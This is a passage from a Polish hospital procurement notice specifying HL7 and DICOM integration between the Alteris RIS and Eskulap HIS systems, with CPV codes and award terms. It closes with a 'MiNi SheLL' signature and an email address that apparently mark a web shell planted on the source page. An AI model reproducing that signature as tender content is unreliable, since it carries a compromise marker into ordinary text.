- Zamawiający dopuszcza każdy z wariantów wymiany danych tj. bezpośrednio na bazie danych, przy wykorzystaniu standardu HL-7 lub przy wykorzystaniu standardu DICOM.
- Opierając się na informacjach pozyskanych od producentów RIS -Alteris i HIS -Eskulap wymogiem dla standardu HL7 jest wersja 2.3 lub 2.5 natomiast dla standardu DICOM wersja 3.0. 
- Zgodnie posiadanymi informacjami w celu realizacji integracji system Eskulap jest w stanie przekazać (np. komunikatem HL7 lub w lisice roboczej) do każdego zlecenia unikalne ID badania z wykorzystaniem, którego możliwa będzie dalej identyfikacja tego badania                      w obydwu systemach.
3.6.2.	Zakres wymiany danych pomiędzy systemami Eskulap i Alteris:
o	Zamawiający wymaga, żeby dane osobowe pacjenta, zgodnie z obowiązującą zasadą jednokrotnego wprowadzania pacjenta, mogły być wprowadzane w jednym z systemów RIS lub HIS  i po wprowadzeniu tych danych, dostępne zarówno jednym jak i drugim systemie. Nie dopuszcza się konieczności ich ponownego wprowadzania  w żadnym z w/w systemów. Dane wprowadzone z poziomu RIS zostają umieszczone w bazie danych systemu HIS. 
- Każde skierowanie (zlecenie na badanie) dotyczące pacjentów przebywających na oddziale lub w poradni wysłane z modułu Dokumentacja Medyczna systemu Eskulap trafi na worklistę do danego aparatu. Analogicznie w odniesieniu do pacjentów przyjmowanych na badania komercyjne lub refundowane przez NFZ, którzy rejestrowani są bezpośrednio w systemie RIS. Dane pacjentów rejestrowanych w systemie RIS zostają pobierane z bazy danych systemu HIS. Obowiązuje zasada jednokrotnego wprowadzania danych.
- Po wykonaniu badania przez urządzenie jego opis następuje na stacji diagnostycznej (opisowa) z dostępem do systemu RIS. Minimalnym zakres wymiany musi przewidywać funkcję, realizacja której powoduje, że wywołanie pola opisowego danego badania w tym systemie implikuje pokazanie na drugim monitorze właściwych obiektów graficznych (zdjęcie, film) stanowiących przedmiot opisu w przeglądarce znajdującej się na stacji diagnostycznej (np. Efilm).
- Uruchomienie odpowiedniej funkcji (przyciśnięcie przycisku /Zdjęcia/) z poziomu HIS Dokumentacji med. pacjenta na oddziale bądź w poradni skutkuje zaprezentowaniem                       w przeglądarce danych obrazowych znajdującej się na danej stacji roboczej (np. k-pacs), skorelowanych z danym opisem badania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.26.70.00-4, 72.25.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com